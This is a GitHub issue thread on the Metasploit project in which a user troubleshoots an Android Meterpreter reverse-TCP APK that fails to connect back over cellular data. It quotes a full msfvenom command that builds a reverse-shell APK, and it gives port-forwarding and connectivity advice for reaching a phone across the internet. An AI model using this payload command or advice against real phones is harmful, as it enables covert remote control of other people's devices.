### ISSUE TITLE
Android and Meterpreter over cellular data is it possible ?

### ISSUE THREAD

**Issue by hutchTek** [rapid7/metasploit-framework#11736]
How'd you do it?

1.  I have a APK that is installed on a android phone with my public ip and port 4444 my router is portforwarded to my kali linux on port 4444 .. but it cant seem to connect .. Can somebody please help me .. 

the meterpreter session just stays waiting and never gets a session ..

**Comment by h00die** [comment]
I would suggest troubleshooting the connection. Can the phone web browser to the IP:port? Can another computer locally and externally? That would help diagnose provider vs firewall vs local issues

**Comment by hutchTek** [comment]
thanks for the quick answer works fine on a local lan, the phone connected over lan i mean. but when i make the apk for my external ip and load the apk on the phone and disconnect from my lan ads use my cellular data the apk does not connect..

**Comment by hutchTek** [comment]
So is it possible to have a meterpreter session over a cellular data connection?

**Comment by h00die** [comment]
Try using the phone web browser to browse to the meters listener and see if the listener says there was a connection. It won't be a meterpreter and stage, but it will determine if the wireless carrier is blocking that port, and that your portfwd rules are working as expected

**Comment by hutchTek** [comment]
ok thanks for the answer .. will check it out now !

**Comment by hutchTek** [comment]
@h00die so I used the cel's browser to access port 8080 on meterpreter and it would start trying to get a session .. but when I try it on the the actual app(apk) it doesnt do jack .. what am i doing worng ..     here's the msfvenom -p android/meterpreter/reverse_tcp LHOST=192.618.1.11 LPORT=8080 > test.apk

**Comment by h00die** [comment]
LHOST can't be `192.168.1.11` when you're on a different network, it isn't routable.
This doesn't seem to be a metasploit bug (which gets reported here), more of a 'how do i use metasploit' question.  Please join the IRC, slack, or consult a how to guide.

**Comment by h00die** [comment]
https://null-byte.wonderhowto.com/how-to/perform-attack-over-wan-internet-0168583/

**Comment by hutchTek** [comment]
@h00die I mistyped the IP address I actually meant my external IP ..  .
